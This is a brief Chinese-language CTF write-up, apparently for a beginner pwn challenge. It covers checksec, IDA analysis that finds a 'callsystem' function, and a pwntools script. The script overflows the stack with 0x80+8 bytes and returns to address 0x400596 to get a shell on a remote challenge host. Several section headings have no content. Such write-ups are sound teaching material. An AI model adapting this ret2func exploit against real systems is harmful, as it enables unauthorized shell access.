題目分析
下載文件后首先使用checksec檢查文件保護機制
文件名太長了,就更改了一下

發現是一個64位程序,使用ida查看偽代碼

注意到一個特殊的函數名callsystem

確定思路,直接棧溢出
信息收集
確定偏移量

/bin/sh地址
方法1

方法2

編寫腳本
from pwn import *
p = remote('111.198.29.45',32366)
#p = process("./pwn001")
system = 0x400596
payload = "A"*0x80+"b"*8+p64(system)
p.sendlineafter("Hello, World",payload)
p.interactive()
本地測試

靶機測試


